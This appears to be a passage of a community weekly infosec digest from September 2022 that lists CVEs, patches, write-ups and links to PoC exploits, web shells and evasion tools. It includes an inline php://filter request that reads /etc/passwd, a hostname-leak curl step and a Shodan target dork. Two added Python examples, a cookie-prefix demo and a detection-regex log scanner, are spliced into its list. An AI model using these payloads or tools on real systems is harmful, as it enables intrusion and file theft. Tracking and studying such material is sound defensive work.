and 7.6.1.3 (CVE-2022-40616)](https://nvd.nist.gov/vuln/detail/CVE-2022-40616)\n- **Adobe** [Bridge versions 12.0.2 (and earlier) and 11.1.3 (and earlier) are affected by a heap-based buffer overflow vulnerability](https://helpx.adobe.com/security/products/bridge/apsb22-49.html)\n\n</details>\n\n<details>\n<summary>\nCVE Analysis & PoC (5):\n</summary>\n\n   - [Analysis: CVE-2022-39197](https://securityonline.info/cve-2022-39197-critical-cobalt-strike-bug-could-lead-to-rce-attacks/)\n        \n        - Title -> Critical Cobalt Strike bug could lead to RCE attacks.\n        - [PoC CVE-2022-39197](https://github.com/burpheart/cve-2022-39197)\n        - Affected Version : prior to 4.7.1.\n        - Description/Issue/Flaw : CVE-2022-39197 is an XSS in how Cobalt Strike renders Beacon metadata: an attacker who controls a Beacon's configuration (or spoofs a Beacon) can supply a username containing HTML, which the Java Swing UI renders as markup. Swing's HTML support can be abused to pull in remote content, escalating the XSS to remote code execution on the operator side. Fixed in 4.7.1.\n \n   - [Analysis: CVE-2022-36934 and CVE-2022-27492](https://nakedsecurity.sophos.com/2022/09/27/whatsapp-zero-day-exploit-news-scare-what-you-need-to-know/)\n        - Title -> WhatsApp "zero-day exploit" news scare - what you need to know\n        - Affected Version : Android prior to v2.22.16.12, Business for Android < v2.22.16.12, iOS < v2.22.16.12, Business for iOS < v2.22.16.12\n        - Description/Issue/Flaw : CVE-2022-36934 (an integer overflow in versions prior to v2.22.16.12 could result in remote code execution in an established video call) & CVE-2022-27492 (an integer underflow in versions prior to v2.22.16.2 could have caused remote code execution when receiving a crafted video file).
\n   - [Analysis: CVE-2022-39205, CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208](https://blog.sonarsource.com/onedev-remote-code-execution/)\n        - Title -> Securing Developer Tools: **OneDev** Remote Code Execution.\n        - Affected Version : 7.2.9.\n        - Description/Issue/Flaw : OneDev is an open-source alternative to GitHub, GitLab and Bitbucket with features such as code search, CI/CD and static code analysis. In this article Paul Gerste (Sonar) walks through the vulnerabilities behind the four CVE IDs above, which lead to remote code execution.\n  \n   - [Analysis: CVE-2022-40286](https://www.x86matthew.com/view_post?id=windows_seagate_lpe)\n        - Title -> Exploiting a Seagate service to create a SYSTEM shell.\n        - Target & Affected Version : Seagate Media Sync (Windows service).\n        - Description/Issue/Flaw : Local privilege escalation: a Seagate Media Sync service running as SYSTEM can be abused by a local user to obtain a SYSTEM shell; the post walks through the exploitation step by step.\n \n   - [Analysis : CVE-2021-41653](https://k4m1ll0.com/cve-2021-41653.html)\n       - [CVE-2021-41653 video PoC](https://www.youtube.com/watch?v=GBuuGdeTKgw&feature=youtu.be)\n       - Target/Product: **TP-Link**\n       - Title : TP-Link TL-WR840N EU v5 Remote Code Execution.\n       - Description/Issue : The goal was to achieve remote code execution on a TP-Link TL-WR840N EU (V5) router. According to its documentation this version came out in 2017; if you are still using the old firmware we highly recommend upgrading to the latest version "TL-WR840N(EU)_V5_211109", which can be downloaded from the vendor's homepage. 
\n\n</details>\n\n<details>\n <summary>CVE PoC, shell & Exploit (9) :\n</summary>\n \n   - [CVE-2022-39197 PoC](https://github.com/Wh04m1001/ZoneAlarmEoP)\n        - Target/Product: **Cobalt Strike**\n        - Description/Issue/Flaw : Mitigation for the CVE-2022-39197 Cobalt Strike XSS: disables HTML rendering in Swing by hooking the isHTMLString method of javax.swing.plaf.basic.BasicHTML, so attacker-supplied Beacon metadata is shown as plain text. (The URL above points to the ZoneAlarmEoP repository; the Cobalt Strike PoC itself is the burpheart repository linked under CVE Analysis & PoC.)\n \n  - [CVE-2022-36804-PoC](https://github.com/notxesh/CVE-2022-36804-PoC) \n        - Target/Product: **Atlassian Bitbucket Server and Data Center**\n        - Affected Version: all versions before 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.2, 8.2.2 and 8.3.1.\n        - Description : The script automatically detects public repositories on a Bitbucket instance and picks a random one to check or exploit. If there are no public repositories, a valid 'BITBUCKETSESSIONID' cookie is required to exploit a known vulnerable instance. The PoC takes multiple input hosts and writes vulnerable hosts to stdout so the results can be piped into other tools.\n    \n   - [CVE-2022-30206](https://github.com/Pwnrin/CVE-2022-30206)\n        - Target/Product: **Microsoft Windows**\n        - Description : PoC for Microsoft CVE-2022-30206: Windows Print Spooler Elevation of Privilege Vulnerability.\n  \n   - [CVE-2022-28282](https://github.com/Pwnrin/CVE-2022-28282)\n        - Target/Product: **Firefox**\n        - Description/Issue/Flaw : PoC for CVE-2022-28282 Firefox: heap use-after-free in DocumentL10n::TranslateDocument.\n\n   - [CVE-2022-34729](https://github.com/Pwnrin/CVE-2022-34729)\n        - Target/Product: **Microsoft Windows** (Windows GDI Elevation of Privilege, patched in September 2022)\n        - Description/Issue/Flaw : The author (NorthSea) has decided to delay public disclosure of this PoC for now.\n\n   - [Cronos PoC](https://github.com/Idov31/Cronos)\n        - Description : PoC for a new sleep obfuscation technique (based on [Ekko](https://github.com/Cracked5pider/Ekko)) leveraging waitable timers to RC4-encrypt the current process image while it sleeps and change the 
permissions from RW to RX to evade memory scanners.\n \n   - [CVE-2022-23743 PoC](https://github.com/Wh04m1001/ZoneAlarmEoP)\n        - Target/Product: **Check Point ZoneAlarm antivirus**\n        - Affected Version: < 15.8.211.19229\n        - Description/Issue/Flaw : Exploit for an arbitrary file move vulnerability in ZoneAlarm AV (local privilege escalation).\n\n   - [Webshell - Open source project](https://github.com/tennc/webshell) \n      - Description : Collection of web shells, the scripts threat actors drop on compromised web servers to keep access and launch further attacks. The project covers the commonly used languages: asp, aspx, php, jsp, pl, py. NOTE : the project is for testing only, and the authors take no responsibility for the consequences of its use.\n\n   - [Windows10 - Custom Kernel Signers](https://github.com/HyperSine/Windows10-CustomKernelSigners) \n     - Description : Load self-signed drivers without enabling TestSigning or disabling DSE (Driver Signature Enforcement).\n         \n</details>\n---\n\n## CVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 14th September - 20th September 2022\n\n \n        Security Patched :   Latest IT security vulnerabilities patched this week at selected vendors such as WhatsApp, Apple, Google,\n                             Microsoft, GitHub, Linux (Ubuntu, Kali etc.), WordPress etc. \n        \n        CVE:ANALYSIS & POC:  CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps.\n         \n        CVE POC :            CVE-2022-32548 RCE, CVE-2022-2588, CVE-2022-34721, CVE-2022-36804, CVE-2022-34709, \n                             CVE-2022-33980, CVE-2019-2215 & GwisinMsi PoC based on the "Recreating an MSI Payload for Fun and no profit" blog.  
\n\n<details>\n\n#### Security patched within a Week (trial)\n \n   - Apple iOS, iPadOS, and macOS Remote Code Execution Vulnerability CVE-2022-32917\n   - Code Aurora ACDB Audio Driver Stack-based Buffer Overflow Vulnerability CVE-2013-2597\n   - Linux Kernel \n     - Improper Input Validation Vulnerability CVE-2013-6282\n     - Integer Overflow Vulnerability CVE-2013-2596\n     - Privilege Escalation Vulnerability CVE-2013-2094\n   - GitHub advisories for packages :\n     - Multiple *TensorFlow (< 2.10.0) packages* (tensorflow, tensorflow-cpu, tensorflow-gpu) are vulnerable to \n       CHECK failures & segfaults that can be used to trigger a denial of service.\n     - oauthlib/oauthlib package (>= 3.1.1, fixed in 3.2.1) vulnerable to DoS when an attacker provides a malicious IPv6 URI.\n     - In the reactphp/http package (>= 0.7.0, < 1.7.0), when ReactPHP processes incoming HTTP cookie values, the cookie names are URL-decoded. Cookies with the reserved prefixes __Host- and __Secure- can therefore be confused with cookies whose percent-encoded names decode to such a prefix (for example `%5F%5FHost-`), which lets an attacker forge a cookie that the application assumes the browser has guaranteed to be secure.
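The cookie-prefix confusion described above, as an added example: a Python re-implementation of the two parser behaviours (names percent-decoded, as in the vulnerable reactphp/http releases, next to names taken literally), not ReactPHP's own code. The Cookie header, cookie names and values below are constructed for this example.

```python
"""Cookie-prefix confusion caused by percent-decoding cookie names.

Added example, not ReactPHP's code: a minimal Cookie-header parser with the
vulnerable behaviour (names URL-decoded, as in reactphp/http < 1.7.0) next to
the fixed behaviour (names taken literally). Header and cookie names below are
constructed for this example.
"""
from urllib.parse import unquote


def parse_cookie_header(header: str, decode_names: bool) -> dict:
    """Parse a Cookie request header into {name: value}.

    decode_names=True reproduces the flaw: the *name* is percent-decoded, so
    "%5F%5FHost-sid" collapses onto the reserved "__Host-sid". A duplicate name
    overwrites the earlier one here (last wins); which duplicate an application
    keeps is implementation-specific, and an attacker can influence ordering
    through the cookie Path anyway.
    """
    cookies = {}
    for pair in header.split(";"):
        pair = pair.strip()
        if "=" not in pair:
            continue
        name, value = pair.split("=", 1)
        if decode_names:
            name = unquote(name)   # vulnerable step: decoding the name
        cookies[name] = unquote(value)
    return cookies


def session_from_cookies(cookies: dict):
    """The application trusts __Host-sid: a browser only accepts a cookie with that
    literal name over HTTPS, host-only and with Path=/, so it cannot be planted from
    a sibling subdomain or a plain-HTTP origin. The guarantee covers the literal
    name only, never a percent-encoded look-alike."""
    return cookies.get("__Host-sid")


def vulnerable_lookup(header: str):
    return session_from_cookies(parse_cookie_header(header, decode_names=True))


def hardened_lookup(header: str):
    return session_from_cookies(parse_cookie_header(header, decode_names=False))


# Constructed Cookie header: the first cookie is the genuine __Host- cookie; the
# second was planted under a percent-encoded name, which the browser stores as an
# ordinary cookie because it does not start with the literal "__Host-" prefix.
ATTACKER_HEADER = "__Host-sid=legit-session; %5F%5FHost-sid=attacker-session"

if __name__ == "__main__":
    print("vulnerable parser sees:", vulnerable_lookup(ATTACKER_HEADER))  # attacker-session
    print("hardened parser sees: ", hardened_lookup(ATTACKER_HEADER))    # legit-session
```

The fix is simply to stop decoding names: cookie names are tokens, `%` is a legal token character, and the browser's prefix rules apply to the literal name it stored. Anything that needs the `__Host-`/`__Secure-` guarantee must compare against the undecoded name.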
It was fixed in reactphp/http v1.7.0.\n \n   - Microsoft Windows Common Log File System (CLFS) Driver Privilege Escalation Vulnerability CVE-2022-37969\n   - Microsoft Windows Remote Code Execution Vulnerability CVE-2010-2568\n   - Trend Micro Apex One and Apex One as a Service Improper Validation Vulnerability CVE-2022-40139\n \n #### CVE Analysis & PoC\n\n   - [CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps](https://breakpoint.sh/posts/turning-your-computer-into-a-gps-tracker-with-apple-maps)\n   - [CVE-2022-32883 PoC](https://github.com/breakpointHQ/CVE-2022-32883)\n       - Target/Product: **Apple Maps**\n       - Patched : update devices running iOS and iPadOS to iOS 15.7/16 and iPadOS 15.7, and macOS Monterey to 12.6.\n       - Description/Issue : Ron Masas found and disclosed two vulnerabilities in Apple Maps that allowed him to extract the accurate location of the user without authorization.\n\n   - [GwisinMsi PoC](https://github.com/ChoiSG/GwisinMsi)\n       - Title: PoC MSI payload; write-up: [Recreating an MSI Payload for Fun and no profit](https://blog.sunggwanchoi.com/recreating-a-msi-payload-for-fun-and-no-profit/)\n       - Target/Product: **Windows Installer (MSI) packages**\n       - Description/Issue : The payload recreates the technique described in the [AhnLab ASEC team's analysis of the Gwisin ransomware MSI payload](https://asec.ahnlab.com/en/37483/).\n\n   - [CVE-2022-2588 PoC](https://github.com/sang-chu/CVE-2022-2588)\n      - Target/Product: **Linux kernel**\n      - Description/Issue: Linux kernel cls_route use-after-free (local privilege escalation).\n\n   - [CVE-2022-34721 PoC](https://github.com/78ResearchLab/PoC/tree/main/CVE-2022-34721)\n       - Title: Windows Internet Key Exchange (IKE) Protocol Extension Remote Code Execution.\n       - Target/Product: **Windows Internet Key Exchange 
(IKE)**\n       - Description/Issue: Three vulnerabilities in the IKE extension were patched on the September 2022 Patch Tuesday. This one was found during IKE-related research by Yuki Chen and has since been patched by Microsoft.\n \n   - [CVE-2022-36804 PoC](https://github.com/CEOrbey/CVE-2022-36804-MASS-RCE)\n       - Target/Product: **Atlassian Bitbucket Server and Data Center**\n       - Affected Version: all versions of Bitbucket Server and Data Center released before 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.2, 8.2.2 and 8.3.1 are vulnerable.\n       - Description/Issue : A critical command injection vulnerability (CVE-2022-36804) in Atlassian Bitbucket Server and Data Center lets an attacker with read access to a public or private repository (so unauthenticated if any public repository exists) execute arbitrary code on the instance.\n\n   - [CVE-2022-34709 PoC](https://bugs.chromium.org/p/project-zero/issues/detail?id=2301)\n       - Title: **Windows: Credential Guard ASN1 Decoder Type Confusion EoP**\n       - Description/Issue : A number of Kerberos Credential Guard APIs do not verify the ASN.1 PDU type when decoding and encoding Kerberos ASN.1 structures, leading to type confusion and elevation of privilege. 
Microsoft patched this as CVE-2022-34709 - [Windows Defender Credential Guard Security Feature Bypass Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34709).\n\n   - [CVE-2022-33980 PoC](https://github.com/HKirito/CVE-2022-33980)\n       - Target/Product: **Apache Commons Configuration**\n       - Affected Version: 2.4 through 2.7 (fixed in 2.8.0)\n       - Description/Issue: Apache Commons Configuration's variable interpolation resolves `${prefix:name}` lookups, and the default set of lookups includes the `script` (evaluates expressions through the JVM script engine), `dns` and `url` prefixes. A configuration value under attacker control can therefore execute code or make the server connect to an arbitrary host.\n\n   - [CVE-2019-2215 PoC](https://github.com/ameetsaahu/Kernel-exploitation/tree/main/CVE-2019-2215)\n       - Target/Product: **Android kernel (binder)**\n       - Affected Version: Android kernels that lack the upstream binder fix (fixed in mainline Linux 4.14; older 3.18/4.4/4.9 Android kernels were affected).\n       - Description/Issue: Exploit for the "Bad Binder" use-after-free CVE-2019-2215 on x86_64 Android.\n \n</details>\n      \n---\n<details>\n<summary><b> \n\nCVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 07th Sept - 13th Sept 2022\n\n        CVE POC :      CVE-2022-22629 macOS, CVE-2022-37706, CVE-2022-40297, CVE-2022-34169, CVE-2022-20128, CVE-2022-20360, CVE-2022-27925, \n                       CVE-2022-37299, CVE-2022-25260, chaining CVE-2021-42278 and CVE-2021-42287. \n        \n        CVE Analysis : Latest IT security vulnerabilities patched at selected vendors such as Apple, Google, Microsoft, GitHub, \n                       Linux (Ubuntu, Kali etc.) & D-Link, plus CVE-2022-34169 and CVE-2022-31474 (WordPress).\n\n        Exploit :      Mobile Mouse 3.6.0.4 Remote Code Execution. \n\n</b></summary> \n \n### CVE PoC :\n  - [CVE-2022-22629 macOS PoC](https://github.com/parsdefense/CVE-2022-22629)\n           \n      - Target & Affected Version: **macOS - Safari < 15.4**\n      - Description/Issue : PoC for the WebGL (a JavaScript API used in browsers to render 2D and 3D graphics) 
bug that was patched in the Safari 15.4 security update.\n  \n  - [CVE-2022-37706 PoC](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit)\n           \n      - Target & Affected Version: **Enlightenment window manager (setuid enlightenment_sys helper) on Ubuntu 22.04 and other distros**\n      - Description/Issue : A reliable exploit plus write-up to elevate privileges to root (tested on Ubuntu 22.04).\n    \n  - [CVE-2022-40297 PoC](https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc)\n    \n    - Target & Version : **Ubuntu Touch 16.04**\n    - Title : Privilege escalation in Ubuntu Touch 16.04 by PIN brute force\n    - Description : Ubuntu Touch lets you "protect" the device with a 4-digit passcode, and the demonstration device used one. The problem is that the same 4-digit passcode is also the password accepted by sudo, so a malicious application can brute-force the 10,000 possible codes and gain root. This means a malicious app can do double harm:\n                        1. Easily escalate privileges and take control of the device.\n                        2. Hand the screen-unlock passcode to a third party.\n\n  - [CVE-2022-20128 PoC](https://github.com/irsl/CVE-2022-20128)\n    \n    - Target : **Android Debug Bridge (adb) - directory traversal**\n    - Description : Android Debug Bridge (adb) was vulnerable to directory traversal attacks that could be mounted by rogue or compromised adb daemons during an `adb pull` operation.\n\n  - [CVE-2022-20360 PoC](https://github.com/nidhi7598/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360)\n     - Target : **Android Settings app (setChecked) local privilege escalation**\n\n  - [CVE-2022-27925 PoC](https://github.com/mohamedbenchikh/CVE-2022-27925)\n    \n    - Target & Patched Version : **Zimbra Collaboration Suite; patched in 8.8.15 P31 and 9.0.0 P24.**\n    - Title : Zimbra Unauthenticated Remote Code Execution Exploit.\n    - Description : CVE-2022-27925 was originally listed as an RCE exploit requiring authentication. 
When combined with a separate bug (the authentication bypass CVE-2022-37042, listed in the 23rd-30th August update below), however, it became an unauthenticated RCE that made remote exploitation trivial.\n \n  - [CVE-2022-37299 PoC](https://vulners.com/cve/CVE-2022-37299)\n  \n    - Target & Version: **Shirne CMS 1.2.0 - path traversal / arbitrary file read**\n    - PoC: the bundled UEditor proxy endpoint fetches whatever `remote` points at, PHP stream wrappers included, so `php://filter` returns local files base64-encoded:\n           GET /static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test\n \n  - [Chaining CVE-2021-42278 and CVE-2021-42287 PoC](https://github.com/Ridter/noPac)\n    - Description/Issue : Exploiting [CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (deceiving the KDC)](https://4sysops.com/archives/exploiting-the-cve-2021-42278-samaccountname-spoofing-and-cve-2021-42287-deceiving-the-kdc-active-directory-vulnerabilities/) to impersonate a Domain Admin from a standard domain user. \n\n  - [CVE-2022-25260](https://github.com/yuriisanin/CVE-2022-25260)\n  \n    - Target & Patched Version : **JetBrains Hub < 2021.1.14276**\n    - Title : JetBrains Hub pre-auth semi-blind server-side request forgery (SSRF).\n    \n    - Description : JetBrains Hub before 2021.1.14276 was vulnerable to improper access control (CVE-2022-34894), which allows an attacker to create untrusted services without authentication even if the guest user is disabled. This makes it possible to exploit the SSRF without any other requirements (normally an attacker would need to be at least authenticated). The SSRF itself was possible because user-supplied SVG icons were rasterised with Apache Batik in its default settings.\n \n### CVE Analysis : \n- This is a trial segment where we are experimenting with the idea of tracking and filtering out CVEs in the software IT professionals rely on. We plan to provide CVE updates for selected vendors such as Apple, Google, Microsoft, GitHub, Android, Linux (Ubuntu, Kali etc.), D-Link, and CVEs listed in the National Cyber Awareness System. 
Let me know if you have suggestions or want to add your favourite vendor to this list.\n\n     - Vulnerability in NVIDIA Data Plane Development Kit affecting Cisco products (Cisco Catalyst 8000V Edge Software, Adaptive Security Virtual Appliance (ASAv) & Secure Firewall Threat Defense Virtual (formerly FTDv))\n     - Apple iOS, iPadOS, and macOS Input Validation Vulnerability CVE-2020-9934\n     - Oracle WebLogic Server Unspecified Vulnerability CVE-2018-2628\n     - Cisco Webex Meetings App (affected versions <= 42.7) Character Interface Manipulation Vulnerability. \n     - Google Chromium Insufficient Data Validation Vulnerability CVE-2022-3075\n     - Android OS Privilege Escalation Vulnerability CVE-2011-1823\n     - [Ubuntu security notices](https://ubuntu.com/security/notices) \n              - Ubuntu 20.04 LTS : Linux kernel (Azure CVM) vulnerabilities.\n              - Ubuntu 16.04 ESM & Ubuntu 14.04 ESM : Dnsmasq vulnerability, LibTIFF vulnerabilities, Linux kernel (HWE) vulnerabilities, linux-oracle (Linux kernel for Oracle Cloud systems).\n     - D-Link DIR-816L RCE Vulnerability CVE-2022-28958\n     - D-Link DIR-820L RCE Vulnerability CVE-2022-26258\n     - D-Link Multiple Routers OS Command Injection Vulnerability CVE-2018-6530\n     - D-Link DIR-300 Router Cleartext Storage of a Password Vulnerability CVE-2011-4723\n     - NETGEAR Multiple Devices Exposure of Sensitive Information Vulnerability CVE-2017-5521\n---\n  \n  - [CVE-2022-34169 Analysis](https://noahblog-360-cn.translate.goog/xalan-j-integer-truncation-reproduce-cve-2022-34169/?_x_tr_sch=http&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp) & construction of a [full exploit](https://gist-github-com.translate.goog/thanatoskira/07dd6124f7d8197b48bc9e2ce900937f?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)\n  \n     - Target: **Apache Xalan-J - a Java implementation of an XSLT processor.**\n     \n     - Description/Issue : In short, a vulnerability in Xalan-J, an Apache 
project used by multiple SAML implementations, could allow arbitrary code execution. Felix Wilhelm (security researcher at Google Project Zero) reported that Xalan-J's XSLTC compiler is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets (XSLT is a language that transforms XML documents into other formats such as HTML): the truncation corrupts the Java class file XSLTC generates from the stylesheet, so a crafted stylesheet can produce arbitrary bytecode that runs in the processing JVM.\n\n - [CVE-2022-31474 WordPress](https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/)\n           \n      - Target: **WordPress plugin - BackupBuddy**\n      - Affected Version : 8.5.8.0 through 8.7.4.1.\n      - Fully Patched Version: 8.7.5\n      \n      - Description/Issue : BackupBuddy, a plugin with around 140,000 active installations, helps WordPress site administrators manage backups and store them at various online and local destinations. The vulnerability, CVE-2022-31474 (CVSS 7.5), exists because of an insecure method of downloading backups for local storage, which lets unauthenticated attackers download arbitrary sensitive files from vulnerable sites. Wordfence reported blocking nearly 5 million attacks targeting it.\n\n - [CVE-2022-31188](https://github.com/emirpolatt/CVE-2022-31188)\n\n ---\n ### EXPLOIT : \n - [Mobile Mouse 3.6.0.4 Remote Code Execution](https://github.com/blue0x1/mobilemouse/blob/main/mobilemouse.py) \n      - Exploit Author: Chokri Hammedi\n      - Vendor Homepage: https://mobilemouse.com/\n      - Software Link: https://www.mobilemouse.com/downloads/setup.exe\n      - Version: 3.6.0.4\n      - Tested on: Windows 10 Enterprise LTSC Build 17763\n      - Description: Mobile Mouse 3.6.0.4 could allow a remote attacker to execute arbitrary code on the system, caused by improper input validation. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. 
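A detection-side counterpart to the Shirne CMS PoC listed under CVE PoC in this week's update (the `php://filter` read through the UEditor proxy endpoint), as an added example that is not from the page or from any of the projects it lists: the scanner walks web-server access-log lines, percent-decodes each query parameter (repeatedly, to catch double encoding) and flags PHP stream wrappers and `../` traversal. The log lines are constructed for the example and modelled on that PoC request; the log format and regexes are this example's own choices.

```python
"""Flag PHP stream-wrapper and path-traversal payloads in web access logs.

Added example; not code from the page or from Shirne CMS/UEditor. The sample log
lines are constructed, modelled on the CVE-2022-37299 PoC request shape.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx combined log format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Stream wrappers PHP will open wherever a URL or filename is expected.
WRAPPER_RE = re.compile(r'^(php|phar|data|expect|file|glob|zip|compress\.\w+)://', re.IGNORECASE)
# A ".." path segment, with / or \ separators, anywhere in the value.
TRAVERSAL_RE = re.compile(r'(^|[/\\])\.\.([/\\]|$)')


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so %2525-style tricks are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target: str) -> list:
    """Return (param, reason, decoded_value) for each query parameter carrying a wrapper or traversal."""
    hits = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(raw)          # parse_qsl already decoded one layer
        if WRAPPER_RE.search(value):
            hits.append((name, "php-wrapper", value))
        elif TRAVERSAL_RE.search(value):
            hits.append((name, "path-traversal", value))
    return hits


def scan_log(lines) -> list:
    """One finding per request whose query string matches; malformed lines are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "path": urlsplit(m.group("target")).path,
                "status": int(m.group("status")),
                "hits": hits,
            })
    return findings


# Constructed sample: one benign request, the PoC request, a double-encoded variant, a traversal.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Sep/2022:10:00:01 +0000] "GET /static/ueditor/php/controller.php?action=config HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Sep/2022:10:00:02 +0000] "GET /static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test HTTP/1.1" 200 2048',
    '203.0.113.9 - - [10/Sep/2022:10:00:03 +0000] "GET /static/ueditor/php/controller.php?action=proxy&remote=php%253A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D%2Fetc%2Fpasswd&maxwidth=-1 HTTP/1.1" 200 2048',
    '203.0.113.9 - - [10/Sep/2022:10:00:04 +0000] "GET /download.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 on the proxy request with a large body is the signal to chase: the `php://filter` read succeeds without any traversal characters, which is why matching only on `../` misses this class of bug.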
\n\n</details>\n---\n<details>\n<summary><b> \n \nCVE's that matter [#Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 30th August - 07th September 2022 \n\n        CVE POC exploit : CVE-2022-1388, CVE-2022-32250 and CVE-2022-2639.\n      \n        CVE Analysis :    CVE-2022-30592, CVE-2021-38297, CVE-2022-31814, CVE-2022-21371, CVE-2022-24637, CVE-2022-33174, CVE-2022-1802,\n                          CVE-2022-23779, CVE-2022-35406 and week #35 of the Advisory Week newsletter.\n \n </b></summary>\n\n\n - [CVE-2022-30592](https://github.com/efchatz/HTTP3-attacks)\n           \n      - Target: **QUIC-enabled servers (IIS, NGINX, LiteSpeed, Cloudflare, H2O, and Caddy)**\n      - Description/Issue : HTTP3-attacks: the repository shares, for educational use, the scripts the authors used in their study of attacks against six different QUIC-enabled servers configured to speak HTTP/3. The http-stream script is the exploit for CVE-2022-30592, which affected the lsquic library. 
This script can also be used against the LiteSpeed server.\n     \n - [CVE-2021-38297 Analysis](https://jfrog.com/blog/cve-2021-38297-analysis-of-a-go-web-assembly-vulnerability/)\n           \n      - Target: **Go programming language (WebAssembly target)**\n      - Patched : fixed versions 1.16.9 and 1.17.2 or later.\n      - Description/Issue : JFrog's analysis lays out the prerequisites for exploiting the Go vulnerability, which allows an attacker to overwrite an entire Wasm (WebAssembly) module with their own malicious code and achieve WebAssembly code execution, and explores mitigation strategies for developers.\n \n- [CVE-2022-23779](https://github.com/Vulnmachines/Zoho_CVE-2022-23779)\n      \n     - Product: **Zoho ManageEngine Desktop Central**\n     - Description/Issue : Zoho internal hostname disclosure vulnerability.\n                            \n                            Step 1: curl -ILk https://IP:port/themes\n                            Step 2: Read the HTTP redirect response and analyse the Location HTTP response header, which leaks the server's internal hostname.\n                            BONUS #Shodan : title:\"ManageEngine Desktop Central 10\"\n\n- [CVE-2022-2639 PoC](https://drive.google.com/drive/folders/1f5YzKy_NChwlbYqHp-7Ih3RTSTBq9Ns6?usp=sharing)\n           \n     - Target: **Linux kernel openvswitch local privilege escalation.**\n     - Tested on : 5.13, 5.4, 4.18.\n     - Description/Issue : Uses the pipe primitive to exploit CVE-2022-2639, so no KASLR leak and no SMAP/SMEP/KPTI bypass is needed.\n\n- [CVE-2022-31814 Analysis](https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/)\n      \n     - Target/Product: **pfBlockerNG plugin (pfSense)**\n     - Affected Version : <= 2.1.4_26\n     - Description/Issue : IHTeam undertook an independent security assessment of pfSense's pfBlockerNG plugin version 2.1.4_26 and identified unauthenticated remote command execution as root (CVE-2022-31814).\n\n - [CVE-2022-21371](https://github.com/Vulnmachines/Oracle-WebLogic-CVE-2022-21371)\n           \n      - 
Target/Product: **Oracle WebLogic Server (Oracle Fusion Middleware)**\n      - Affected Version : 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0\n      - Description/Issue : The Web Container component of Oracle WebLogic Server is vulnerable to local file inclusion. The easily exploitable vulnerability allows an unauthenticated attacker with HTTP network access to compromise Oracle WebLogic Server; a successful attack gives complete access to all of WebLogic Server's accessible data or unrestricted access to sensitive data.\n\n - [CVE-2022-1388_PoC](https://github.com/alt3kx/CVE-2022-1388_PoC)\n           \n      - Target: **F5 BIG-IP RCE exploitation**\n      - Affected Version : F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions: undisclosed requests may bypass iControl REST authentication.\n      - Description/Issue : F5 BIG-IP RCE exploitation (CVE-2022-1388): the iControl REST authentication bypass lets an unauthenticated attacker run commands on the appliance.\n\n - [CVE-2022-33174](https://github.com/Henry4E36/CVE-2022-33174)\n           \n      - Target/Product: **[Powertek PDUs](https://www.powertekpdus.com/)**\n      - Affected Version : Powertek PDU versions prior to 3.30.30\n      - Description/Issue : Powertek PDUs are custom rack power distribution units from Powertek Corporation. Versions prior to 3.30.30 allow remote authorisation to be bypassed in the web interface. 
